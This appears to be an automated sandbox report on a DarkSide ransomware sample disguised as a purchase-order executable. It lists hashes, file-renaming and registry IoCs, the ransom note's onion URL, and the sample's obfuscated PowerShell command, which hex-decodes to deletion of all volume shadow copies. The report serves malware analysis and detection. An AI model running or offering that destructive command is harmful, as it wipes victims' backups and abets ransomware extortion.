Analysis
-
max time kernel
37s -
max time network
81s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
04-08-2021 18:10
Static task
static1
Behavioral task
behavioral1
Sample
PurchaseOrderPoster.bin.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
PurchaseOrderPoster.bin.exe
Resource
win10v20210408
General
-
Target
PurchaseOrderPoster.bin.exe
-
Size
30KB
-
MD5
f00aded4c16c0e8c3b5adfc23d19c609
-
SHA1
86ca4973a98072c32db97c9433c16d405e4154ac
-
SHA256
4d9432e8a0ceb64c34b13d550251b8d9478ca784e50105dc0d729490fb861d1a
-
SHA512
a2697c2b008af3c51db771ba130590e40de2b0c7ad6f18b5ba284edffdc7a38623b56bc24939bd3867a55a7d263b236e02d1f0d718a5d3625402f2325cbfbedf
Malware Config
Extracted
C:\\README.f2cbf9aa.TXT
darkside
http://darksidfqzcuhtk2.onion/OBB5DDMR8RB9DI2RYYF376YGBJAV2J4F2NXFEWPBSXY709MAA0MY7PMBBQJ0HVG3
Signatures
-
DarkSide
Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.
-
Modifies extensions of user files 18 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
PurchaseOrderPoster.bin.exedescription ioc process File opened for modification C:\Users\Admin\Pictures\ExpandCopy.tiff PurchaseOrderPoster.bin.exe File opened for modification C:\Users\Admin\Pictures\GetRestart.png.f2cbf9aa PurchaseOrderPoster.bin.exe File opened for modification C:\Users\Admin\Pictures\RestoreResize.png.f2cbf9aa PurchaseOrderPoster.bin.exe File renamed C:\Users\Admin\Pictures\HideWrite.crw => C:\Users\Admin\Pictures\HideWrite.crw.f2cbf9aa PurchaseOrderPoster.bin.exe File opened for modification C:\Users\Admin\Pictures\HideWrite.crw.f2cbf9aa PurchaseOrderPoster.bin.exe File opened for modification C:\Users\Admin\Pictures\UndoDebug.crw.f2cbf9aa PurchaseOrderPoster.bin.exe File renamed C:\Users\Admin\Pictures\SelectUnblock.raw => C:\Users\Admin\Pictures\SelectUnblock.raw.f2cbf9aa PurchaseOrderPoster.bin.exe File opened for modification C:\Users\Admin\Pictures\SelectUnblock.raw.f2cbf9aa PurchaseOrderPoster.bin.exe File opened for modification C:\Users\Admin\Pictures\StopMeasure.tiff PurchaseOrderPoster.bin.exe File renamed C:\Users\Admin\Pictures\ExpandCopy.tiff => C:\Users\Admin\Pictures\ExpandCopy.tiff.f2cbf9aa PurchaseOrderPoster.bin.exe File opened for modification C:\Users\Admin\Pictures\ExpandCopy.tiff.f2cbf9aa PurchaseOrderPoster.bin.exe File renamed C:\Users\Admin\Pictures\GetRestart.png => C:\Users\Admin\Pictures\GetRestart.png.f2cbf9aa PurchaseOrderPoster.bin.exe File renamed C:\Users\Admin\Pictures\RestoreResize.png => C:\Users\Admin\Pictures\RestoreResize.png.f2cbf9aa PurchaseOrderPoster.bin.exe File renamed C:\Users\Admin\Pictures\UndoDebug.crw => C:\Users\Admin\Pictures\UndoDebug.crw.f2cbf9aa PurchaseOrderPoster.bin.exe File renamed C:\Users\Admin\Pictures\AssertSplit.raw => C:\Users\Admin\Pictures\AssertSplit.raw.f2cbf9aa PurchaseOrderPoster.bin.exe File opened for modification C:\Users\Admin\Pictures\AssertSplit.raw.f2cbf9aa PurchaseOrderPoster.bin.exe File renamed C:\Users\Admin\Pictures\StopMeasure.tiff => C:\Users\Admin\Pictures\StopMeasure.tiff.f2cbf9aa PurchaseOrderPoster.bin.exe File opened for modification C:\Users\Admin\Pictures\StopMeasure.tiff.f2cbf9aa PurchaseOrderPoster.bin.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Sets desktop wallpaper using registry 2 TTPs 2 IoCs
Processes:
PurchaseOrderPoster.bin.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\f2cbf9aa.BMP" PurchaseOrderPoster.bin.exe Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\f2cbf9aa.BMP" PurchaseOrderPoster.bin.exe -
Modifies Control Panel 1 IoCs
Processes:
PurchaseOrderPoster.bin.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Control Panel\Desktop\WallpaperStyle = "10" PurchaseOrderPoster.bin.exe -
Modifies registry class 5 IoCs
Processes:
PurchaseOrderPoster.bin.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\f2cbf9aa\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\f2cbf9aa.ico" PurchaseOrderPoster.bin.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.f2cbf9aa PurchaseOrderPoster.bin.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.f2cbf9aa\ = "f2cbf9aa" PurchaseOrderPoster.bin.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\f2cbf9aa\DefaultIcon PurchaseOrderPoster.bin.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\f2cbf9aa PurchaseOrderPoster.bin.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exePurchaseOrderPoster.bin.exepid process 916 powershell.exe 916 powershell.exe 1696 PurchaseOrderPoster.bin.exe 1696 PurchaseOrderPoster.bin.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
Processes:
PurchaseOrderPoster.bin.exepowershell.exevssvc.exedescription pid process Token: SeIncreaseQuotaPrivilege 1696 PurchaseOrderPoster.bin.exe Token: SeSecurityPrivilege 1696 PurchaseOrderPoster.bin.exe Token: SeTakeOwnershipPrivilege 1696 PurchaseOrderPoster.bin.exe Token: SeLoadDriverPrivilege 1696 PurchaseOrderPoster.bin.exe Token: SeSystemProfilePrivilege 1696 PurchaseOrderPoster.bin.exe Token: SeSystemtimePrivilege 1696 PurchaseOrderPoster.bin.exe Token: SeProfSingleProcessPrivilege 1696 PurchaseOrderPoster.bin.exe Token: SeIncBasePriorityPrivilege 1696 PurchaseOrderPoster.bin.exe Token: SeCreatePagefilePrivilege 1696 PurchaseOrderPoster.bin.exe Token: SeBackupPrivilege 1696 PurchaseOrderPoster.bin.exe Token: SeRestorePrivilege 1696 PurchaseOrderPoster.bin.exe Token: SeShutdownPrivilege 1696 PurchaseOrderPoster.bin.exe Token: SeDebugPrivilege 1696 PurchaseOrderPoster.bin.exe Token: SeSystemEnvironmentPrivilege 1696 PurchaseOrderPoster.bin.exe Token: SeRemoteShutdownPrivilege 1696 PurchaseOrderPoster.bin.exe Token: SeUndockPrivilege 1696 PurchaseOrderPoster.bin.exe Token: SeManageVolumePrivilege 1696 PurchaseOrderPoster.bin.exe Token: 33 1696 PurchaseOrderPoster.bin.exe Token: 34 1696 PurchaseOrderPoster.bin.exe Token: 35 1696 PurchaseOrderPoster.bin.exe Token: SeDebugPrivilege 916 powershell.exe Token: SeBackupPrivilege 936 vssvc.exe Token: SeRestorePrivilege 936 vssvc.exe Token: SeAuditPrivilege 936 vssvc.exe -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
PurchaseOrderPoster.bin.exedescription pid process target process PID 1696 wrote to memory of 916 1696 PurchaseOrderPoster.bin.exe powershell.exe PID 1696 wrote to memory of 916 1696 PurchaseOrderPoster.bin.exe powershell.exe PID 1696 wrote to memory of 916 1696 PurchaseOrderPoster.bin.exe powershell.exe PID 1696 wrote to memory of 916 1696 PurchaseOrderPoster.bin.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe"C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe"1⤵
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Modifies Control Panel
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndexMD5
33e42934d49a01d00c2f656779ab39d0
SHA1b0948a8ae1ea8366fd8f937b312261bc07dfaa93
SHA256b0666e4e1732399e09d1e053de280ace5426e52eb5b212d023e6e7999a7ec542
SHA51290fe2726a2e9d8a721e698343c83c2d5b03be65fda52506d14a530bb1d8a03a2415dbee22dd96d35e4e0045a4bd360dee97354ef47de9e5d7ab5db1a1c1a8771
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msMD5
412607a2f0f0a4a33ae00c4f5e887ce0
SHA167cb09380ea4efd2c819ba95e3acc13a3bd96e16
SHA256398901c2bc541fea59b18686b97154e5fea02d3f2ce32ca9a494239c250ffa8c
SHA512dbddcb177a2c50a80409481f44b949b4f970726994cd2feef067da5606799ce89dd64f186a98355104b0c2066823c1960d965c01231f83dc3d46266c39b9ec69
-
memory/916-65-0x00000000025E0000-0x00000000025E1000-memory.dmpFilesize
4KB
-
memory/916-62-0x0000000002350000-0x0000000002351000-memory.dmpFilesize
4KB
-
memory/916-63-0x000000001AD00000-0x000000001AD01000-memory.dmpFilesize
4KB
-
memory/916-64-0x0000000002430000-0x0000000002431000-memory.dmpFilesize
4KB
-
memory/916-66-0x000000001AC80000-0x000000001AC82000-memory.dmpFilesize
8KB
-
memory/916-67-0x000000001AC84000-0x000000001AC86000-memory.dmpFilesize
8KB
-
memory/916-68-0x000000001C4D0000-0x000000001C4D1000-memory.dmpFilesize
4KB
-
memory/916-69-0x000000001C5A0000-0x000000001C5A1000-memory.dmpFilesize
4KB
-
memory/916-61-0x000007FEFBAE1000-0x000007FEFBAE3000-memory.dmpFilesize
8KB
-
memory/916-60-0x0000000000000000-mapping.dmp
-
memory/1696-59-0x0000000075211000-0x0000000075213000-memory.dmpFilesize
8KB